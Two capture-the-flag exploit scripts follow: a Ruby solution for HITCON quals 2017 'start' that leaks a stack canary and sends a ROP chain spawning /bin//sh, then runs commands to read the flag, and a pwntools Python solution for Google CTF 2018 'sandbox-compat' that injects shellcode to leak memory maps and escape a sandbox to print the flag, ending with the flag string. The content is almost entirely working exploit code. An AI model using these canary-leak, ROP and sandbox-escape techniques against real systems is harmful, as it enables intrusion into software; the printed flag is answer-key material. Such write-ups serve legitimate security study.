File: hitcon-quals-2017/start/exp.rb
host, port = '127.0.0.1', 31338
$z = Sock.new host, port
def z;$z;end
context.arch = 'amd64' 

z.write('A' * 25)
canary = u64("\x00" + z.gets[25, 7])
log.info('canary: ' + canary.hex)

rop = flat(
  0x4017f7,
  0x6cc080,
  0x47a6e6,
  '/bin//sh', 'A' * 16,
  0x475fc1,
  0x4017f7,
  0x6cc088,
  0x42732f,
  0x475fc1,
  0x4005d5,
  0x6cc080,
  0x4017f7,
  0x6cc088,
  0x47a6e6,
  59, 0, 0,
  0x468e75
)
z.write('A' * 24 + canary.p64 + 'A' * 8 + rop)
z.gets
z.puts 'exit'

z.puts('id')
z.puts('cat /home/`whoami`/flag')
z.puts('exit')

loop do
  s = z.gets
  break if s.empty?
  puts s
end

STDOUT.puts('[EOF]')

File: google-ctf-quals-2018/sandbox-compat/exp.py
#!/usr/bin/env python2

from pwn import *
import sys
import os

host, port = 'sandbox-compat.ctfcompetition.com', 1337
local = False
if len(sys.argv) == 1:
  host = '127.0.0.1'
  local = True

context.arch = 'i386'
r = remote(host, port)

payload = asm(
"""
    mov esp, 0xbef00000 - 0x200
""" +
    shellcraft.pushstr('/proc/self/maps') +
    #  shellcraft.pushstr('/etc/os-release') +
"""
    mov esi, esp
    call open
    mov ebp, eax
    mov esi, ebp /* fd */
    mov edx, esp
    mov ecx, 124 /* dummy */
    call read

    mov esi, ebp /* fd */
    mov edx, esp
    mov ecx, 12
    call read

    mov esi, 1
    mov edx, esp
    mov ecx, eax
    call write

    mov esi, 0
    mov edx, esp
    mov ecx, 0x10
    call read /* read return address */

    std /* Yoooooo! */
    mov esi, esp
    add esi, 8
    call open

    mov esi, eax /* open("flag")'s fd */
    mov edx, esp
    mov ecx, 0x100
    call read

    mov esi, 1
    mov edx, esp
    mov ecx, eax
    call write

    call exit
write:
    mov edi, 1
    call syscall
    ret
open:
    mov edi, 2
    call syscall
    ret
read:
    mov edi, 0
    call syscall
    ret
exit:
    mov edi, 0xe7 /* exit_group */
    mov esi, 217
    call syscall
syscall:
    xor eax, eax
    dec eax
    shl eax, 12
    push eax
    ret
"""
)

#  context.log_level = 'debug'

context.clear(arch = 'amd64')
r.recvuntil('code!\n')
r.send(payload + 'deadbeef')
r.recvuntil("[*] let's go...\n")
text_base = u64(unhex(r.recvn(12))[::-1] + '\0\0')
log.info('text base: ' + hex(text_base))
#  raw_input()
log.info("Sending forged address..")
r.send(flat(
    text_base + 0x13d7,
    "flag".ljust(8, '\x00'),
))

r.interactive()

# CTF{Hell0_N4Cl_Issue_51!}
